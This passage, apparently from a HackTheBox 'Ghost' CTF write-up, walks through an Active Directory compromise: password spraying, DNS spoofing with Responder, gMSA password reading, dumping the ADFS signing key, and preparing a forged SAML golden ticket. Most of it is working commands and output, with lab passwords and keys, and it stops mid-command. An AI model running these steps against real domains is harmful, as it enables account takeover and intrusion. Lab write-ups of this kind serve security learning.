<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FoY9ijCrMUfGS52q9bVa7%2Fimage.png?alt=media&amp;token=ec20bcc9-ce39-4937-80d6-cb5fbe74f04a" alt=""><figcaption></figcaption></figure>

Back on the attack machine i have tried for  Password spraying the credentials obtained in the env variables `LDAP_BIND_PASSWORD` against all known domain users found in the gitea instance confirmed a valid login for `intranet_principal`.

```bash
┌──(ajay㉿kali)-[~]
└─$ nxc  smb 10.129.231.105 -u users.txt -p 'He!KA9oKVT3rL99j'

SMB         10.129.231.105  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:ghost.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.231.105  445    DC01             [-] ghost.htb\kathryn.holland:He!KA9oKVT3rL99j STATUS_LOGON_FAILURE 
SMB         10.129.231.105  445    DC01             [-] ghost.htb\cassandra.shelton:He!KA9oKVT3rL99j STATUS_LOGON_FAILURE 
SMB         10.129.231.105  445    DC01             [-] ghost.htb\robert.steeves:He!KA9oKVT3rL99j STATUS_LOGON_FAILURE 
SMB         10.129.231.105  445    DC01             [-] ghost.htb\florence.ramirez:He!KA9oKVT3rL99j STATUS_LOGON_FAILURE 
SMB         10.129.231.105  445    DC01             [-] ghost.htb\justin.bradley:He!KA9oKVT3rL99j STATUS_LOGON_FAILURE 
SMB         10.129.231.105  445    DC01             [-] ghost.htb\arthur.boyd:He!KA9oKVT3rL99j STATUS_LOGON_FAILURE 
SMB         10.129.231.105  445    DC01             [-] ghost.htb\beth.clark:He!KA9oKVT3rL99j STATUS_LOGON_FAILURE 
SMB         10.129.231.105  445    DC01             [-] ghost.htb\charles.gray:He!KA9oKVT3rL99j STATUS_LOGON_FAILURE 
SMB         10.129.231.105  445    DC01             [-] ghost.htb\jason.taylor:He!KA9oKVT3rL99j STATUS_LOGON_FAILURE 
SMB         10.129.231.105  445    DC01             [+] ghost.htb\intranet_principal:He!KA9oKVT3rL99j
```

### Bloodhound as Intranet\_principal

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FXetbsZsnq3Wf7aYUIabb%2Fimage.png?alt=media&amp;token=0cf0654e-1244-406a-87f5-406ec58208ca" alt=""><figcaption></figcaption></figure>

looking at bloodhound florence has no outbound object control.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FZbG7IigoGVhkVV0ijLA5%2Fimage.png?alt=media&amp;token=8cb7e9cf-24bf-46e0-8e33-002a4dac5f94" alt=""><figcaption></figcaption></figure>

Transfer the kerberos ticket to attack host.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FNCGhzTH4NWkOR3zKo1dt%2Fimage.png?alt=media&amp;token=dd0d9aae-4fde-4a97-8f21-a4fab908bf08" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FiLvN5fJUxt9OERQwSQ95%2Fimage.png?alt=media&amp;token=9452d4f9-f2cb-4d56-b478-456ab4400100" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FOL0ZPOluVACmyRxBy0YO%2Fimage.png?alt=media&amp;token=1dd5916b-cefb-4b45-98f0-bef2bb9bd22b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FxTDs8pVrLV9AbCLJLYWP%2Fimage.png?alt=media&amp;token=d3125eaf-f76e-4081-b6ae-f9395b721b07" alt=""><figcaption></figcaption></figure>

could not find anything else as florence.

## Shell as justin.bradley

But from the forum justin.bradley posted an issue with the connection to bitbucket.htb.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F8SItN6O1xsLPjogioR5t%2Fimage.png?alt=media&amp;token=76b78430-ed6e-4077-9add-871a3dce0453" alt=""><figcaption></figcaption></figure>

justin.bradley has a script that connects to bitbucket.ghost.htb and checks pipeline results. Now that we have credentials  for a user we can add a fake dns record pointing to our server.

### DNS Spoofing

First setup responder : `sudo responder -I tun0 -v`

```bash
┌──(ajay㉿kali)-[~]
└─$ python3 /home/ajay/Tools/krbrelayx/dnstool.py -u GHOST.HTB\\florence.ramirez -k -dc-ip 10.129.231.105 -dns-ip 10.129.231.105 -r bitbucket.ghost.htb -a add -d 10.10.15.204 dc01.ghost.htb
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
```

watch out the responder for NTLM hash of jbradley.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fsro09LSnFL0FjSfchO5y%2Fimage.png?alt=media&amp;token=951bde2d-a78f-47c7-9d12-616644d8abd3" alt=""><figcaption></figcaption></figure>

cracked the hash using JohnTheRipper offline.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FPHNTBb1JtrjBfMAjyqOb%2Fimage.png?alt=media&amp;token=854526f5-febd-4b23-b7ca-ed320387866b" alt=""><figcaption></figcaption></figure>

Going back to bloodhound loot justin.bradley is part of Remote management users group so we can get a remote access.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fd19EqjpzS795RL49VnPS%2Fimage.png?alt=media&amp;token=6738e95d-d1ed-4014-b204-4713f18559db" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F7eLYWPu1S4JGAWlAN9kw%2Fimage.png?alt=media&amp;token=9bfc02a4-5cfe-4a87-a40c-db74943b02df" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FBcXqU9Uusf3scQWgdFXs%2Fimage.png?alt=media&amp;token=77469925-fe03-4532-857c-e3a694fab746" alt=""><figcaption></figcaption></figure>

collect the flag and BloodHound revealed that `justin.bradley` had `ReadGMSAPassword` rights over the `ADFS_GMSA$` managed service account.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FehDjGINO75QGXkuhQvSL%2Fimage.png?alt=media&amp;token=9df67e08-7e88-4615-82a7-a0b5bf4c32a6" alt=""><figcaption></figcaption></figure>

### ReadGMSAPassword

I can sue bloodyAD to do it.

```bash
──(ajay㉿kali)-[~]
└─$ bloodyAD --host 10.129.231.105 -d 'ghost.htb' -u 'justin.bradley' -p 'Qwertyuiop1234$$' get object 'ADFS_GMSA$' --attr msDS-ManagedPassword

distinguishedName: CN=adfs_gmsa,CN=Managed Service Accounts,DC=ghost,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:16b9766667b1e9f8d4c315a11707c497
msDS-ManagedPassword.B64ENCODED: K01qnDP64/cgmu+pTLVCxOYHbFV1da/3pknf/2We99Sl5f6Tefc6BGPydqkye2p4qTycQAVBtA01oZzZuTfk3WbUoxJpt5Hpj7W960ZgZo/h/jPGyH0n9VpauYZpo2pX//+R79555tckXJ+aoTNEc9EMvGFP/Wh10JDVU5Y3cj9MMsK37mblCKa2QHxQCl64h9ittI2VwwZjNo92SKWZ0JBBCgBsjVxWOJj6kxJ8SZMlr5MkdpeYxa+4gR0IYeZ0w1/jRe9kMSLQvNBQVW9FxxAgLOvM6rtkE9e6wFZWnNUmiRrTxu3ltp23wTB59a4jgQpH2vIAD2DiOZTLwj3Nag==
```

Got the NTLM Hash for ADFS\_GMSA$.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FW0FiJDM35LfxWrKscFFN%2Fimage.png?alt=media&amp;token=b9846627-cff0-4ddf-a0ab-2bb324079e22" alt=""><figcaption></figcaption></figure>

## Shell as ADFS\_GMSA$

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FHio2wTd0R69NIgTQnNwD%2Fimage.png?alt=media&amp;token=cf370c88-74fc-4eb3-801b-b30eecdd7d5d" alt=""><figcaption></figcaption></figure>

No interesting permissions found to escalate privileges.

The admin panel on `core.ghost.htb` was protected by ADFS-based federated authentication, meaning it delegated all identity verification to `federation.ghost.htb` via SAML 2.0. Rather than validating credentials directly, the application trusted any SAML token that carried a valid signature from the ADFS Token Signing Certificate. ADFS stores this signing key encrypted within Active Directory's Distributed Key Management container, accessible to the service account running the ADFS role.

We can use a specialized tool called pyADFSDump or ADFSDump.py to remotely query Active Directory via LDAP using your gMSA context. This bypasses the need for high local privileges on the host.

### Extracting ADFS Configuration via LDAP

We can use a specialized tool called pyADFSDump or ADFSDump.py to remotely query Active Directory via LDAP using your gMSA context. This bypasses the need for high local privileges on the host.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FgIVXMeRwWZ8eENf0WNn7%2Fimage.png?alt=media&amp;token=469b801b-adc5-4600-b768-f659a2ec78d4" alt=""><figcaption></figcaption></figure>

#### ADFSDump.exe

```powershell
*Evil-WinRM* PS C:\Users\adfs_gmsa$\Desktop> .\ADFSDump.exe
    ___    ____  ___________ ____
   /   |  / __ \/ ____/ ___// __ \__  ______ ___  ____
  / /| | / / / / /_   \__ \/ / / / / / / __ `__ \/ __ \
 / ___ |/ /_/ / __/  ___/ / /_/ / /_/ / / / / / / /_/ /
/_/  |_/_____/_/    /____/_____/\__,_/_/ /_/ /_/ .___/
                                              /_/
Created by @doughsec


## Extracting Private Key from Active Directory Store
[-] Domain is ghost.htb
[-] Private Key: FA-DB-3A-06-DD-CD-40-57-DD-41-7D-81-07-A0-F4-B3-14-FA-2B-6B-70-BB-BB-F5-28-A7-21-29-61-CB-21-C7


[-] Private Key: 8D-AC-A4-90-70-2B-3F-D6-08-D5-BC-35-A9-84-87-56-D2-FA-3B-7B-74-13-A3-C6-2C-58-A6-F4-58-FB-9D-A1


## Reading Encrypted Signing Key from Database
[-] Encrypted Token Signing Key Begin
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
[-] Encrypted Token Signing Key End

[-] Certificate value: 0818F900456D4642F29C6C88D26A59E5A7749EBC
[-] Store location value: CurrentUser
[-] Store name value: My

## Reading The Issuer Identifier
[-] Issuer Identifier: http://federation.ghost.htb/adfs/services/trust
[-] Detected AD FS 2019
[-] Uncharted territory! This might not work...
## Reading Relying Party Trust Information from Database
[-]
core.ghost.htb
 ==================
    Enabled: True
    Sign-In Protocol: SAML 2.0
    Sign-In Endpoint: https://core.ghost.htb:8443/adfs/saml/postResponse
    Signature Algorithm: http://www.w3.org/2001/04/xmldsig-more#rsa-sha256
    SamlResponseSignatureType: 1;
    Identifier: https://core.ghost.htb:8443
    Access Policy: <PolicyMetadata xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2012/04/ADFS">
  <RequireFreshAuthentication>false</RequireFreshAuthentication>
  <IssuanceAuthorizationRules>
    <Rule>
      <Conditions>
        <Condition i:type="AlwaysCondition">
          <Operator>IsPresent</Operator>
        </Condition>
      </Conditions>
    </Rule>
  </IssuanceAuthorizationRules>
</PolicyMetadata>


    Access Policy Parameter:

    Issuance Rules: @RuleTemplate = "LdapClaims"
@RuleName = "LdapClaims"
c:[Type == "http://schemas.microsoft.com/ws/2008/06/identity/claims/windowsaccountname", Issuer == "AD AUTHORITY"]
 => issue(store = "Active Directory", types = ("http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn", "http://schemas.xmlsoap.org/claims/CommonName"), query = ";userPrincipalName,sAMAccountName;{0}", param = c.Value);


*Evil-WinRM* PS C:\Users\adfs_gmsa$\Desktop
```

Because the Token Signing Key is encrypted using Active Directory's Distributed Key Management (DKM) system, you must first decrypt that Base64 block using the DKM master keys to get the raw, usable private X.509 signing certificate.

You can handle the decryption and the subsequent token forging right from your Kali Linux machine. A common tool for this is **`py_saml_forge`**.

Logging on the federation.ghost.htb leads to core.ghost.htb which use SAML to validate so we can forge the SAML golden ticket and submit it to login as Administrator.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FbWL6caVpol41ZixosAMT%2Fimage.png?alt=media&amp;token=7323ad85-7b93-40d8-a767-86195df6b3c2" alt=""><figcaption></figcaption></figure>

I will use ADspoof to forge the tickets. since its build in old library i had to install the necessary libraries required in the docker.

```bash
sudo docker run -it --rm -v ~/Tools/ADFSpoof:/ADFSpoof  python:3.10 bash
cd /ADFSpoof

apt-get update
apt-get install -y gcc g++ libxml2-dev libxslt1-dev

pip install --upgrade pip setuptools wheel
pip install -r requirements.txt
```

### Forging SAML Ticket

Thanks to **`0xdf`** for proper explanation of this process. I had so many issues doing this.

Using `ADFSpoof.py` inside a Docker container (due to legacy library requirements), a forged SAML response was generated asserting `Administrator@ghost.htb` as the authenticated identity, targeting the `core.ghost.htb` relying party:

```bash
┌──(ajay㉿kali)-[~/Tools/ADFSpoof]
└─$ echo "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